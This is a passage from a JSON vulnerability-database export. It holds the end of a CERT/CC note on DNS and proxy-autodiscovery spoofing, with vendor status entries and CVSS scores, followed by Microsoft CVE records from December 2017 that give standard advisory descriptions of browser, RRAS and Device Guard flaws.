further vendor information regarding this vulnerability.\n\n### Xilinx Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Zebra Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Zephyr Project Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### aep NETWORKS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### dnsmasq Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eero Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of 
further vendor information regarding this vulnerability.\n\n### gdnsd Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### iPass Inc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### m0n0wall Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netsnmp Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netsnmpj Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### pfSENSE Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:ND/RL:ND/RC:ND \nEnvironmental | 0 | 
CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://googleprojectzero.blogspot.fi/2017/12/apacolypse-now-exploiting-windows-10-in_18.html>\n * <https://www.exploit-db.com/exploits/43367/>\n\n### Acknowledgements\n\nThis attack was found, tested and reported by Ossi Salmi, Mika Sepp\u00e4nen, Marko Laakso and Kasper Kyll\u00f6nen of Arctic Security. We asked for the help of Jussi Eronen and Iikka Sovanto of NCSC-FI in reaching out to the vendor representatives.\n\nThis document was written by Laurie Tyzenhaus and Garret Wasserman.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-11903](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11903>), [CVE-2017-11810](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11810>), [CVE-2017-11793](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11793>), [CVE-2017-11890](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11890>), [CVE-2017-11907](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11907>), [CVE-2017-11906](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11906>), [CVE-2017-11855](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11855>) \n---|--- \n**Date Public:** | 2018-09-05 \n**Date First Published:** | 2018-09-05 \n**Date Last Updated:** | 2018-10-23 17:34 UTC \n**Document Revision:** | 59 \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-05T00:00:00", "type": "cert", "title": "Automatic DNS registration and proxy autodiscovery allow spoofing of network services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11793", "CVE-2017-11810", "CVE-2017-11855", "CVE-2017-11890", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907"], "modified": "2018-10-23T17:34:00", "id": "VU:598349", "href": "https://www.kb.cert.org/vuls/id/598349", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-10-26T18:28:15", "description": "An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nIn a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. 
For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nThe security update addresses the vulnerability by changing how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11919"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11919", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11919", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T18:28:15", "description": "An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. 
This could potentially result in the disclosure of sensitive information to a malicious site.\n\nTo exploit the vulnerability an attacker would have to trick a user into browsing to a malicious website or to an SMB or UNC path destination. An attacker who successfully tricked a user into disclosing the user's NTLM hash could attempt a brute-force attack to disclose the corresponding hash password.\n\nThe security update addresses the vulnerability by correcting how the Windows its:// protocol handler determines the zone of a request.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Microsoft Windows Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2018-05-08T07:00:00", "id": "MS:CVE-2017-11927", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11927", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access 
enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would need to run a specially crafted application against an RPC server which has Routing and Remote Access enabled. Routing and Remote Access is a non-default configuration; systems without it enabled are not vulnerable.\n\nThe security update addresses the vulnerability by correcting how the Routing and Remote Access service handles requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Windows RRAS Service Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11885", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11885", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", 
"description": "An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit the vulnerability, in a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nThe security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Internet Explorer Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11887"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11887", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11887", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. 
Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11888"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11888", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11888", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. 
Because Device Guard relies on the signature to determine the file is non-malicious, Device Guard could then allow a malicious file to execute.\n\nIn an attack scenario, an attacker could make an untrusted file appear to be a trusted file.\n\nThe update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Device Guard Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11899"], "modified": "2018-01-25T08:00:00", "id": "MS:CVE-2017-11899", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11899", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11918"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11918", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11918", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11893"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11893", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11893", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11889"], "modified": "2017-12-12T08:00:00", "id": 
"MS:CVE-2017-11889", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11889", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit the vulnerability, in a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nThe security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Internet Explorer Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11906", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11906", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the browser rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11895"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11895", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11895", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
